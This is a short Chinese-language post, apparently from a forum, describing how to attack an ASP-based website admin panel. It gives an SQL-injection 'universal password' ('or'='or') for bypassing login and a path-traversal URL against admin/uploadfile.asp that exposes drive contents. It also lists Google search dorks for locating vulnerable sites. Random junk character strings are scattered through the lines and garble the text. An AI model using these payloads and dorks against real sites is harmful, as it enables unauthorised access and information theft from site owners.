后台万能密码 'or'='or'
* C, x- U8 C, z5 f. y1 t4 _
6 f: S3 i' Q; p+ q3 S后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!+ a5 O5 v+ l) H. ^" ~
admin/uploadfile.asp?currentFolder=/upfiles/../
9 Z' L) X; o$ `
6 w+ y S5 c0 _+ w& ~漏洞证明:
; ]2 W5 k! O8 g G4 c2 B+ E
- e( f) U7 |3 @7 C( f3 P- y谷歌:inurl:type.asp?id=1 新闻中心" q8 M# d7 X5 v
或者 :inurl:download_ok.asp?4 h- M. K9 [/ F# R* p4 K/ ~* l
, ?- ^0 I2 P- E/ G Z4 A0 o8 C
|